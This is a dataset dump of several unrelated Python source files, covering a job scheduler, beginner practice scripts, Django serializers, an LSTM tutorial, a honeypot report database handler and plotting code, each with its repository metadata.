self.at_time.replace(tzinfo=tzlocal())\n return self\n\n def between(self, time_str):\n \"\"\"Schedule the job at a random time between two timestamps.\"\"\"\n times = []\n for t in time_str.split('-'):\n dt = parser.parse(t, tzinfos=tz_offsets)\n if not dt.tzinfo:\n dt = dt.replace(tzinfo=tzlocal())\n times.append(dt)\n self.between_times = tuple(times)\n return self\n\n def starting(self, date_str):\n self.start_run = parser.parse(date_str, tzinfos=tz_offsets)\n if not self.start_run.tzinfo:\n self.start_run = self.start_run.replace(tzinfo=tzlocal())\n return self\n\n def do(self, job_func, *args, **kwargs):\n \"\"\"Specifies the job_func that should be called every time the\n job runs.\n\n Any additional arguments are passed on to job_func when\n the job runs.\n \"\"\"\n self.job_func = functools.partial(job_func, *args, **kwargs)\n functools.update_wrapper(self.job_func, job_func)\n self._schedule_next_run()\n return self\n\n @property\n def should_run(self):\n \"\"\"True if the job should be run now.\"\"\"\n return datetime.datetime.now(tzlocal()) >= self.next_run\n\n def run(self):\n \"\"\"Run the job and immediately reschedule it.\"\"\"\n logger.info('Running job %s', self)\n self.job_func()\n self.last_run = datetime.datetime.now(tzlocal())\n self._schedule_next_run()\n\n def _schedule_next_run(self):\n \"\"\"Compute the instant when this job should run next.\"\"\"\n # Allow *, ** magic temporarily:\n # pylint: disable=W0142\n assert self.unit in ('seconds', 'minutes', 'hours', 'days', 'weeks')\n starting = self.start_run or datetime.datetime.now(tzlocal())\n\n self.period = datetime.timedelta(**{self.unit: self.interval})\n self.next_run = starting + self.period\n\n if self.run_days:\n run_days = self.run_days[:]\n if self.last_run:\n starting = self.last_run\n # Don't consider this day group if it has been run already\n for day in self.run_days:\n if self.last_run.isoweekday() in day:\n run_days.remove(day)\n\n days = set()\n for day in run_days:\n days.add(random.sample(day, 1)[0])\n\n if not days:\n days_delta = 0\n else:\n # Calculate the closest day from the starting date\n delta_all = sorted([(i - starting.isoweekday()) % 7\n for i in days])\n days_delta = delta_all[0]\n\n if (days_delta == 0 and self.last_run and\n self.last_run.date() == starting.date()):\n # Make sure the job doesn't run today twice\n if self.unit == 'days':\n days_delta = 7\n elif self.unit == 'weeks':\n days_delta = self.interval * 7\n self.next_run = starting + datetime.timedelta(days=days_delta)\n\n if self.between_times:\n start, end = self.between_times\n # Choose a random time between both timestamps\n self.at_time = (start + datetime.timedelta(\n seconds=random.randint(0, int(\n (end - start).total_seconds()))))\n if self.at_time:\n self.next_run = self.next_run.replace(hour=self.at_time.hour,\n minute=self.at_time.minute,\n second=self.at_time.second,\n microsecond=0,\n tzinfo=self.at_time.tzinfo)\n # If we are running for the first time, make sure we run\n # at the specified time *today* as well\n if (not self.last_run and not self.run_days and\n self.at_time > datetime.datetime.now(tzlocal())):\n self.next_run = self.next_run - datetime.timedelta(days=1)\n\n logger.info('Scheduled job %s', self)\n\n\n# The following methods are shortcuts for not having to\n# create a Scheduler instance:\n\ndefault_scheduler = Scheduler()\njobs = default_scheduler.jobs # todo: should this be a copy, e.g. jobs()?\n\n\ndef every(interval=1):\n \"\"\"Schedule a new periodic job.\"\"\"\n return default_scheduler.every(interval)\n\n\ndef on(*days):\n \"\"\"Schedule a new job to run on specific weekdays.\n\n See the docstring for `Job.on()`.\n \"\"\"\n return default_scheduler.on(*days)\n\n\ndef run_pending():\n \"\"\"Run all jobs that are scheduled to run.\n\n Please note that it is *intended behavior that run_pending()\n does not run missed jobs*. For example, if you've registered a job\n that should run every minute and you only call run_pending()\n in one hour increments then your job won't be run 60 times in\n between but only once.\n \"\"\"\n default_scheduler.run_pending()\n\n\ndef run_all(delay_seconds=0):\n \"\"\"Run all jobs regardless if they are scheduled to run or not.\n\n A delay of `delay` seconds is added between each job. This can help\n to distribute the system load generated by the jobs more evenly over\n time.\"\"\"\n default_scheduler.run_all(delay_seconds=delay_seconds)\n\n\ndef clear():\n \"\"\"Deletes all scheduled jobs.\"\"\"\n default_scheduler.clear()\n\n\ndef next_run():\n \"\"\"Datetime when the next job should run.\"\"\"\n return default_scheduler.next_run\n\n\ndef idle_seconds():\n \"\"\"Number of seconds until `next_run`.\"\"\"\n return default_scheduler.idle_seconds\n","sub_path":"schedule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"559652797","text":"'''\nstr='zhanghuandepython'\nprint(str)\nprint(str[0:-1])\nprint(str*2)\nprint(str + 'hello')\nprint('hello\\nbean')\nprint(r'hello\\nbean')\n#似乎python里空格不影响程序的阅读,和编译\n\nx=\"a\"\ny=\"b\"\nprint(x)\nprint(y)\nprint('-------------')\nprint(x,end=\" \")\nprint(y)\n\ncounter = 100 #整型变量\nmiles = 1000.0 #浮点型变量\nname = \"number\" #字符串\nprint(counter)\nprint(miles)\nprint(name)\n\n#python允许你同时为多个变量赋值\n#a=b=c=1\n#可以为多个变量指定多个值\na,b,c=1,2,\"bean\"\nprint(a,b,c)\n#a=1,b=2,c=bean\n\na,b,c,d=20,5.5,True,4+3j\nprint(type(a),type(b),type(c),type(d))\n\na=111\nprint(isinstance(a,int))\n#单纯的使用isinstance不会输出,但使用python环境直接就可以使用isinstance输出\nimport math\nimport numpy\ndef quad(a,b,c):\n drt=(numpy.square(b)-4*a*c)\n if(drt==0):\n x=-b/(2*a)\n return x\n elif(drt>0):\n x1=-(b+math.sqrt(drt))/(2*a)\n x2=-(b-math.sqrt(drt))/(2*a)\n return x1,x2\n else:\n print('无解')\n\ndef person(name,age,**key):\n if 'city' in key:\n pass\n if 'job' in key:\n pass\n print('name:',name,'age:',age,key)\nperson('jack',24,city='beijing',addr='chaoyang',zipcode=12345)\n\ndef product(x, *number):\n for n in number:\n x = x*n\n return x\nprint(product(5,6))\n'''\nimport docx\nimport jieba\nfrom gensim import corpora,models,similarities\n\nfile=docx.Document(\"C:\\\\Users\\\\zh\\\\Desktop\\\\1.docx\")\ndoc_test=docx.Document(\"C:\\\\Users\\\\zh\\\\Desktop\\\\2.docx\")\n'''用来比较的文档'''\n\nall_doc=[]\nall_doc2=[]\nfor i in file.paragraphs:\n\tall_doc.append(file.paragraphs.text)\n\tall_doc2.append(doc_test.paragraphs.text)\n\nall_doc_list=[]\nfor doc in all_doc:\n\tdoc_list=[word for word in jieba.cut(doc)]\n\tall_doc_list.append(doc_list)\n\nall_doc_test=[]\nfor doc2 in all_doc:\n\tdoc_list2=[word for word in jieba.cut(doc2)]\n\tall_doc_test.append(doc_list2)\n\ndictionary = corpora.Dictionary(all_doc_list)\ndictionary.keys()\ndictionary.token2id\ncorpus = [dictionary.doc2bow(doc) for doc in all_doc_list]\n\n\n'''转化测试文档'''\ndoc_test_vec = dictionary.doc2bow(all_doc_test)\n\n'''//建模'''\ntfidf=models.TfidfModel(corpus)\ntfidf[doc_test_vec]\n\n'''测试相似度'''\nindex = similarities.SparseMatrixSimilarity(tfidf[corpus],num_features=len(dictionary.keys()))\nsim = index[tfidf[doc_test_vec]]\nsorted(enumerate(sim), key=lambda item: -item[1])","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"375436782","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencentBlueKing is pleased to support the open source community by making 蓝鲸智云-权限中心(BlueKing-IAM) available.\nCopyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\nimport logging\nfrom typing import Any, MutableMapping, Union\n\nfrom rest_framework import serializers\nfrom rest_framework.serializers import empty\n\nfrom backend.apps.policy.serializers import AttributeSLZ\n\nlogger = logging.getLogger(__name__)\n\n\nclass ASInstanceSLZ(serializers.Serializer):\n \"\"\"\n 接入系统申请的资源实例\n \"\"\"\n\n system = serializers.CharField(label=\"系统ID\", default=\"\", allow_blank=True, required=False)\n type = serializers.CharField(label=\"资源类型\")\n id = serializers.CharField(label=\"资源ID\")\n\n\nclass ASResourceTypeSLZ(serializers.Serializer):\n \"\"\"\n 接入系统申请操作的资源类型\n \"\"\"\n\n system = serializers.CharField(label=\"系统ID\")\n type = serializers.CharField(label=\"资源类型\")\n instances = serializers.ListField(\n label=\"资源拓扑\",\n child=serializers.ListField(child=ASInstanceSLZ(label=\"资源实例\"), allow_empty=False),\n allow_empty=True,\n default=list,\n )\n attributes = serializers.ListField(\n label=\"属性\", default=list, required=False, child=AttributeSLZ(label=\"属性\"), allow_empty=True\n )\n\n\nclass ASActionSLZ(serializers.Serializer):\n \"\"\"\n 接入系统申请操作\n \"\"\"\n\n id = serializers.CharField(label=\"操作ID\")\n related_resource_types = serializers.ListField(\n label=\"关联资源类型\", child=ASResourceTypeSLZ(label=\"资源类型\"), allow_empty=True, default=list\n )\n\n\nclass AccessSystemApplicationSLZ(serializers.Serializer):\n \"\"\"\n 接入系统申请\n \"\"\"\n\n system = serializers.CharField(label=\"系统ID\")\n actions = serializers.ListField(label=\"申请操作\", child=ASActionSLZ(label=\"操作\"), allow_empty=False)\n\n @staticmethod\n def _convert_system(data: MutableMapping[str, Any]):\n \"\"\"兼容数据里system和system_id\"\"\"\n if \"system\" not in data and \"system_id\" in data:\n data[\"system\"] = data[\"system_id\"]\n\n def __init__(self, instance=None, data: Union[empty, MutableMapping] = empty, **kwargs):\n # 兼容用户传入system与system_id,之前老的协议是system_id,后面新协议都统一是system\n if data is not empty:\n try:\n self._convert_system(data)\n for action in data.get(\"actions\", []):\n for rrt in action.get(\"related_resource_types\", []):\n self._convert_system(rrt)\n for rrt_instance in rrt.get(\"instances\", []):\n for node in rrt_instance:\n self._convert_system(node)\n except Exception as error: # pylint: disable=broad-except\n logger.info(f\"when access system application data serialized, convert system data error: {error}\")\n\n super().__init__(instance, data, **kwargs)\n\n def validate(self, data):\n action_ids = {action[\"id\"] for action in data[\"actions\"]}\n if len(data[\"actions\"]) != len(action_ids):\n raise serializers.ValidationError(\"actions must not repeat\")\n return data\n\n\nclass AccessSystemApplicationUrlSLZ(serializers.Serializer):\n url = serializers.URLField()\n","sub_path":"saas/backend/api/application/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"64681921","text":"__author__='Joe_Fan'\n\nimport os\n\ndef sanitize(time_string):\n if '-' in time_string:\n spliter = '-'\n elif ':' in time_string:\n spliter = ':'\n else:\n return(time_string)\n\n (min, secs) = time_string.split(spliter)\n return (min + '.' + secs)\n\ntry:\n with open('james.txt', 'r') as jaf:\n data = jaf.readline()\n james = data.strip().split(',')\n\n with open('julie.txt') as juf:\n \tdata = juf.readline()\n \tjulie = data.strip().split(',')\n\n with open(\"mikey.txt\") as mif:\n \tdata = mif.readline()\n \tmikey = data.strip().split(',')\n\n with open(\"sarah.txt\") as saf:\n \tdata = saf.readline()\n \tsarah = data.strip().split(',')\nexcept IOError as e:\n raise e\n\njames_clean =[]\njulie_clean =[]\nmikey_clean =[]\nsarah_clean =[]\n\nfor each_item in james:\n james_clean.append(sanitize(each_item))\nfor each_item in julie:\n julie_clean.append(sanitize(each_item))\nfor each_item in mikey:\n mikey_clean.append(sanitize(each_item))\nfor each_item in sarah:\n sarah_clean.append(sanitize(each_item))\n\nprint(sorted(james_clean))\nprint(sorted(julie_clean))\nprint(sorted(mikey_clean))\nprint(sorted(sarah_clean))","sub_path":"ch5/ch5_p149.py","file_name":"ch5_p149.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"230467441","text":"from google.appengine.ext import db\r\n\r\nfrom datetime import datetime, timedelta\r\nimport logging\r\nimport math\r\nimport reqfilter\r\nimport mixins\r\n\r\nimport calc\r\n\r\nhrsDay = 24\r\nhrsWeek = 7*hrsDay\r\nhrsYear = 365*hrsDay+6\r\nhrsMonth = hrsYear/12\r\n\r\n# Scores are based on hours since 1/1/2000\r\ndtBase = datetime(2000,1,1)\r\n\r\ndef scorable(half_lives=None):\r\n \"\"\"\r\n Class decorator to make a db.Model class scorable.\r\n \r\n Usage:\r\n \r\n @scorable([half_lives])\r\n class MyModel(db.Model)\r\n ...\r\n \r\n If using python 2.5:\r\n \r\n class MyModel(db.Model)\r\n ...\r\n \r\n MyModel = scorable([half_lives])(MyModel)\r\n \r\n The following methods will be added to the class:\r\n \r\n update_scores(value, [datetime])\r\n order_by_score(query, half_life)\r\n set_timescore_results(results, half_life, [datetime])\r\n score_now(half_life, [datetime], [increment])\r\n named_scores([datetime])\r\n \r\n The following attributes will be added to the class:\r\n \r\n TS_NAME_score = db.FloatProperty() - Log(S) for each half-life being scored\r\n TS_hrs = db.FloatProperty() - Number of hours since 1/1/2001 at last scoring\r\n TS_half_lives - non-persisted list of half lives computed for this model \r\n \r\n Note, because app engine db.Model uses a metaclass, this could not\r\n be implemented as a class decorator, as it must be run during\r\n class definition time, before the metaclass code runs.\r\n \"\"\"\r\n \r\n if half_lives is None:\r\n half_lives = [hrsDay, hrsWeek, hrsMonth, hrsYear]\r\n \r\n def _scorable(cls_base):\r\n \"\"\"\r\n Return a new class with the same name as the original, but derived from\r\n the original class as it's base. This will allow the metaclass for the db.Model\r\n to execute at (new) class initialization time and recognize our newly added properties.\r\n \"\"\"\r\n prop_dict = {}\r\n prop_dict['TS_half_lives'] = tuple(half_lives)\r\n \r\n # Add Model properties to the class \r\n for hrs in half_lives:\r\n prop_dict['TS_%s_score' % halflife_name(hrs)] = db.FloatProperty(required=True, default=0.0)\r\n \r\n prop_dict['TS_hrs'] = db.FloatProperty(required=True, default=0.0)\r\n \r\n # Add timescore methods to the class\r\n for func in [update_scores, score_now, named_scores, is_new_score]:\r\n prop_dict[func.__name__] = func\r\n \r\n cls_new = type(cls_base.__name__, (cls_base,mixins.Cacheable), prop_dict)\r\n \r\n # For pickling to work - we need to have the same module name as the\r\n # wrapped class\r\n cls_new.__module__ = cls_base.__module__\r\n \r\n logging.info(\"Scoreable class: %r\" % cls_base.__name__)\r\n \r\n return cls_new\r\n\r\n \"\"\"\r\n These methods will be (dynamically) added to a db.Model class\r\n \"\"\"\r\n\r\n def update_scores(self, value=0, dt=None):\r\n \"\"\"\r\n Update the model properties for the timescore values to bring up to the current\r\n time. Increasing in score will (attempt to) write the datastore.\r\n \"\"\"\r\n for half_life in self.TS_half_lives:\r\n ts = self.score_now(half_life, dt, value=value)\r\n setattr(self, halflife_attr(half_life), ts.log_score)\r\n self.TS_hrs = ts.time_last\r\n \r\n # If we've updated score - we want to persist the model (eventually)\r\n if value > 0: \r\n self.set_dirty()\r\n \r\n def score_now(self, half_life, dt=None, value=0):\r\n \"\"\"\r\n Return the current timescore for the given half_life - optionally add a\r\n value to the current score.\r\n \r\n NOT written back to the data store\r\n \"\"\"\r\n ts = calc.Score(half_life, getattr(self, halflife_attr(half_life)), time_last=self.TS_hrs)\r\n ts.increment(value, hours_from_datetime(dt))\r\n return ts\r\n \r\n def named_scores(self, dt=None):\r\n \"\"\"\r\n Return a dictionary of timescore values for the current time. It is assumed\r\n that dt is >= any past scoring time for this model.\r\n \"\"\"\r\n mScores = {}\r\n for half_life in self.TS_half_lives:\r\n mScores[halflife_name(half_life)] = self.score_now(half_life, dt).score\r\n return mScores\r\n \r\n def is_new_score(self):\r\n \"\"\"\r\n Return True when the scores seem to be newly initialized.\r\n \"\"\"\r\n return self.TS_hrs == 0.0\r\n\r\n return _scorable\r\n\r\n\"\"\"\r\nTimescore helper functions\r\n\"\"\"\r\n\r\ndef order_by_score(query, half_life):\r\n \"\"\"\r\n modify the query to be ordered by descending score for the half-life given\r\n \"\"\"\r\n return query.order('-%s' % halflife_attr(half_life))\r\n\r\ndef set_timescore_results(results, half_life, dt=None):\r\n \"\"\"\r\n Add a (non-persisted) attribute 'timescore' to each model in the\r\n list of results, corresponding to the current (time-based) score\r\n for the given half_life.\r\n \"\"\"\r\n for model in results:\r\n if model is None:\r\n continue\r\n model.timescore = model.score_now(half_life, dt).score\r\n return results\r\n \r\ndef hours_from_datetime(dt=None):\r\n if dt is None:\r\n dt = reqfilter.get_request().dtNow\r\n ddt = dt - dtBase\r\n hrs = ddt.days*hrsDay + float(ddt.seconds)/60/60\r\n return hrs\r\n\r\ndef datetime_from_hours(hrs):\r\n ddt = timedelta(float(hrs/hrsDay))\r\n dt = dtBase + ddt\r\n return dt\r\n\r\ndef halflife_name(half_life):\r\n return {hrsDay:'day', hrsWeek:'week', hrsMonth:'month', hrsYear:'year'}.get(half_life, str(half_life))\r\n\r\ndef halflife_attr(half_life):\r\n return 'TS_%s_score' % halflife_name(half_life)\r\n","sub_path":"labs/py/kahnsept/thapp/timescore/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"515181821","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 8 17:05:14 2018\nTrying to paralelise things in python\n\n\"\"\"\n\nfrom joblib import Parallel, delayed\nimport multiprocessing\nimport itertools\n\n\n# what are your inputs, and what operation do you want to \n# perform on each input. For example...\ninputs = range(100) \njnputs =range(100)\n\ndef processInput(i):\n return i**2\n \nnum_cores = multiprocessing.cpu_count()\n\npairs=[]\nfor i in inputs:\n pairs.append([i,jnputs[i]])\nresults=Parallel(n_jobs=num_cores)(delayed(processInput)(i) for i in inputs)\n\n\n\n#Trying to build an entrance pair\n\na = ['foo', 'bar', 'baz']\nb = ['x', 'y', 'z', 'w']\ninput_param=[]\nconstant=3\nfor r in itertools.product(a, b): input_param.append([r[0],r[1],constant])","sub_path":"Lammps/dev/Paralelise.py","file_name":"Paralelise.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"53195352","text":"#################################\n# Author : Abhisek Mohanty\n# Description : Reads the Sentiment training data from the dataset on disk, cleans the data and keeps it ready for the sentiment classifier.\n#################################\nimport re\n\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nimport os\nimport pandas as pd\n\n\ndef clean_tweet(tweet_row):\n tweet = tweet_row['SentimentText']\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n\ndef readTrainingDataForSentimentAnalysis():\n subdirectory = 'sentiment_train_data'\n loaded_data = pd.read_csv(\n os.path.join(subdirectory, 'train.csv'),\n # os.path.join(subdirectory, 'Sentiment_Analysis_Dataset.csv'),\n error_bad_lines=False\n )\n\n loaded_data.columns = ['Sentiment', 'id', 'date', 'query', 'user', 'SentimentText']\n # loaded_data.head()\n final_data = loaded_data\n final_data = loaded_data.groupby('Sentiment').head(50000).reset_index(drop=True) # Take the first 100,000 rows for training\n final_data.shape\n\n final_data['tweet'] = final_data.apply(lambda row: clean_tweet(row), axis=1)\n return final_data\n","sub_path":"src/sentiment_training_data.py","file_name":"sentiment_training_data.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"111165438","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 27 22:10:07 2021\n\n@author: BT\n\"\"\"\n\n'''\nEn raison des transformations appliquées aux données lors de la traversée d’un RNR, certaines \ninformations sont perdues après chaque étape temporelle. Au bout d’un certain temps, l’état du RNR \nne contient quasi plus de traces des premières entrées. Ce comportement peut être rédhibitoire. \n\nImaginons que Dory(Un personnage des films d’animation Le monde de Nemo et Le monde de Dory qui \nsouffre de pertes de mémoire à court terme) essaie de traduire une longue phrase; lorsqu’elle a \nterminé sa lecture, elle n’a plus d’informations sur son début. \n\nPour résoudre ce problème, plusieurs types de cellules avec une mémoire à long terme ont été imaginés. \nLeur efficacité a été telle que les cellules de base ne sont quasi plus employées. Commençons par étudier \nla plus populaire de ces cellules, la cellule LSTM.\n\nLSTM Cell\n---------\nLa cellule de longue mémoire à court terme ( LSTM, Long Short-Term Memory ) a été proposée en 1997 par \nSepp Hochreiter et Jürgen Schmidhuber. Elle a été progressivement améliorée au fil des ans par plusieurs \nchercheurs, comme Alex Graves (2013), Hasim Sak (2014) et Wojciech Zaremba (2014). \n\nSi l’on considère la cellule LSTM comme une boîte noire, on peut s’en servir presque comme une cellule \nde base, mais avec de bien meilleures performances. L’entraînement convergera plus rapidement et détectera \nles dépendances à long terme présentes dans les données. Dans Keras, il suffit de remplacer la couche \nSimpleRNN par une couche LSTM:\n'''\n\nimport tensorflow as tf\nimport numpy as np\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom utils import generate_time_series, generate_data, plot_series, plot_learning_curves\nfrom utils import plot_multiple_forecasts, last_time_step_mse\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# let's create an RNN that predicts the next 10 steps at each time step. \n# That is, instead of just forecasting time steps 50 to 59 based on time steps 0 to 49, \n# it will forecast time steps 1 to 10 at time step 0, then time steps 2 to 11 at time step 1, \n# and so on, and finally it will forecast time steps 50 to 59 at the last time step. \n# Notice that the model is causal: when it makes predictions at any time step, it can only see\n# past time steps.\nn_steps = 50\nseries = generate_time_series(10000, n_steps + 10)\nX_train = series[:7000, :n_steps]\nX_valid = series[7000:9000, :n_steps]\nX_test = series[9000:, :n_steps]\nY = np.empty((10000, n_steps, 10))\nfor step_ahead in range(1, 10 + 1):\n Y[..., step_ahead - 1] = series[..., step_ahead:step_ahead + n_steps, 0]\ny_train = Y[:7000]\ny_valid = Y[7000:9000]\ny_test = Y[9000:]\n\n\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.LSTM(20, return_sequences=True, input_shape=[None, 1]),\n tf.keras.layers.LSTM(20, return_sequences=True),\n tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(10))\n])\n\nmodel.compile(loss=\"mse\", optimizer=\"adam\", metrics=[last_time_step_mse])\nhistory = model.fit(X_train, y_train, epochs=20, validation_data=(X_valid, y_valid))\n\nseries = generate_time_series(1, 50 + 10, random_state=43)\nX_new, y_new = series[:, :50, :], series[:, 50:, :]\n\n# predict\ny_pred_lstm = model.predict(X_new)[:, -1][..., np.newaxis]\nloss_lstm = np.mean(tf.keras.metrics.mean_squared_error(y_new, y_pred_lstm))\n\nprint('-'*10)\nprint('shape y_pred_lstm', y_pred_lstm.shape)\nprint('loss loss_lstm =', loss_lstm)\nprint('-'*10)\n\nplot_multiple_forecasts(X_new, y_new, y_pred_lstm, 'Deep RNN with LSTM', loss_lstm)\nplt.show()\n\n'''\nUne autre solution consiste à utiliser la couche générique keras.layers.RNN , en lui passant LSTMCell \nen argument. Toutefois, Puisque l’implémentation de la couche LSTM a été optimisée pour une exécution \nsur les GPU, il est préférable de l’employer (la couche RNN est surtout utile lors de la définition \nde cellules personnalisées, comme nous l’avons fait précédemment).\n'''\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.RNN(tf.keras.layers.LSTMCell(20), return_sequences=True,input_shape=[None, 1]),\n tf.keras.layers.RNN(tf.keras.layers.LSTMCell(20), return_sequences=True), \n tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(10))\n ])\n\n'''\nComment une cellule LSTM fonctionne-t- elle? Son architecture est illustrée par la figure lstm_cell.jpg. \nSi l’on ignore le contenu de la boîte noire, la cellule LSTM ressemble fortement à une cellule normale, \nà l’exception de son état qui est divisé en deux vecteurs: h(t) et c(t) («c» pour «cellule»). \n\nh(t) peut être vu comme l’état à court terme et c(t) comme l’état à long terme.\n\nOuvrons la boîte! Voici l’idée centrale: \nle réseau peut apprendre ce qu’il faut stocker dans l’état à long terme, ce qui doit être oublié et \nce qu’il faut y lire. \n\nLe parcours de l’état à long terme c(t–1) au travers du réseau va de la gauche vers la droite. \nIl passe tout d’abord par une porte d’oubli ( forget gate ), qui abandonne certaines informations, \npuis en ajoute de nouvelles via l’opération d’addition (les informations ajoutées sont sélectionnées \npar une porte d’entrée [ input gate ]), et le résultat c( t) est envoyé directement, \nsans autre transformation. Par conséquent, à chaque étape temporelle, des informations sont retirées \net d’autres sont ajoutées. Par ailleurs, après l’opération d’addition, l’état à long terme est copié \net soumis à la fonction tanh, dont le résultat est filtré par la porte de sortie ( output gate ). \nOn obtient alors l’état à court terme h(t) , qui est égal à la sortie de la cellule pour l’étape \ntemporelle y(t) .\n\nVoyons d’où proviennent les nouvelles informations et comment fonctionnent les portes. \nPremièrement, le vecteur d’entrée courant x(t) et l’état à court terme précédent h (t–1) \nsont fournis à quatre couches intégralement connectées, ayant toutes un objectif différent: \n \n • La couche principale génère g(t)/C_t: \n elle joue le rôle habituel d’analyse des entrées courantes x(t) et de l’état précédent \n (à court terme) h (t–1). Une cellule de base comprend uniquement cette couche et sa sortie \n est transmise directement à y ( t ) et à h (t) . En revanche, dans une cellule LSTM, \n la sortie de cette couche ne se fait pas directement mais ses parties les plus importantes \n sont stockées dans l’état à long terme (le reste est abandonné). \n \n • Les trois autres couches sont des contrôleurs de porte . Puisqu’elles utilisent la fonction \n d’activation logistique, leurs sorties sont dans la plage 0 à 1. Celles-ci étant passées à des \n opérations de multiplication par éléments, une valeur 0 ferme la porte, tandis qu’une valeur 1 \n l’ouvre. Plus précisément: \n \n –La porte d’oubli (contrôlée par f(t)) décide des parties de l’état à long terme qui \n doivent être effacées.\n \n –La porte d’entrée (contrôlée par i ( t ) ) choisit les parties de g(t)/C_t qui doivent \n être ajoutées à l’état à long terme.\n \n –La porte de sortie (contrôlée par o(t)) sélectionne les parties de l’état à long terme \n qui doivent être lues et produites lors de cette étape temporelle, à la fois dans h ( t ) \n et dans y ( t ) . \n \nEn résumé, une cellule LSTM peut apprendre à reconnaître: une entrée importante \n(le rôle de la porte d’entrée), la stocker dans l’état à long terme, la conserver \naussi longtemps que nécessaire (le rôle de la porte d’oubli) et l’extraire lorsqu’elle est \nrequise. Cela explique pourquoi elles réussissent très bien à identifier des motifs à long terme dans \ndes séries chronologiques, des textes longs, des enregistrements audio, etc.\n\nL’équation sur la figure lstm_cell.jpg récapitule le calcul de l’état à long terme d’une cellule, \nde son état à court terme et de sa sortie à chaque étape temporelle, pour une seule instance \n(les équations pour un mini-lot complet sont très similaires).\n'''\n\n","sub_path":"DL/15_RNNs/4_tackling_short_term_memory.py","file_name":"4_tackling_short_term_memory.py","file_ext":"py","file_size_in_byte":8340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"88888624","text":"__author__ = 'Charlie Mitchell '\n'''\nThis class will take in a request from the webserver, query the Sqlite database,\nand return JSON.\n'''\n\nimport os\nimport sqlite3\n\nfrom common.GlobalConfig import Configuration\nfrom reportserver.manager import dateTimeUtility\n\ncfg_path = os.getenv('RECCE7_PLUGIN_CONFIG') or 'config/plugins.cfg'\nglobal_config = Configuration(cfg_path).getInstance()\ndb_path = global_config.get_db_dir() + '/honeyDB.sqlite'\n\n# Connect to given database.\n# Defaults to the honeypot db, but another path can be passed in (mainly for testing).\n# Database needs to exist first.\ndef connect(database_name=db_path):\n if not os.path.exists(database_name):\n print(\"Database does not exist in path: \" + database_name)\n return None\n try:\n conn = sqlite3.connect(database_name)\n except sqlite3.OperationalError:\n print(\"Error connecting to database at: \" + database_name)\n else:\n return conn\n\n# Query DB and return JSON\n# setting DB to TestDB created from DatabaseHandlerTest.py\ndef query_db(query, args=(), one=False):\n cur = connect().cursor()\n cur.execute(query, args)\n r = [dict((cur.description[i][0], value) \\\n for i, value in enumerate(row)) for row in cur.fetchall()]\n cur.connection.close()\n return (r[0] if r else None) if one else r\n\n# Unit of Measure could be \"weeks\", \"days\", \"hours\", etc.\n# Return all data from the DB within that measure of time as JSON.\ndef get_json_by_time(portnumber, unit, unit_size):\n begin_date = dateTimeUtility.get_begin_date(unit, unit_size)\n begin_date_iso = dateTimeUtility.get_iso_format(begin_date)\n tableName = get_table_name(portnumber)\n date_time_field = get_table_datetime_field(portnumber)\n\n # query = query_db(\"SELECT * FROM %s where (datetime > '%s')\" % (tableName, query_date_iso))\n queryString = \"SELECT * FROM %s where (%s > '%s')\" % (tableName, date_time_field, begin_date_iso)\n # print(\"queryString is: \" + queryString)\n results = query_db(queryString)\n # print(\"results: \" + results)\n\n return results\n\n# Returns the table name of the given port number from the config file.\ndef get_table_name(portnumber):\n gc_dict = global_config.get_plugin_config(portnumber)\n return gc_dict['table']\n\n\n# Returns the name of the datetime field from the config file.\ndef get_table_datetime_field(portnumber):\n return global_config.get_db_datetime_name()","sub_path":"reportserver/dao/DatabaseHandler.py","file_name":"DatabaseHandler.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"138590465","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Main\nt = np.linspace(0, 2 * np.pi, 400)\nplt.plot(np.cos(t), np.sin(t), label=\"cercle\")\nx = [1, -1 / 2, -1 / 2, 1]\ny = [0, 3**(1 / 2) / 2, - 3**(1 / 2) / 2, 0]\nplt.plot(x, y, label=\"triangle\")\nplt.legend(loc=0)\nplt.title(\"Courbes 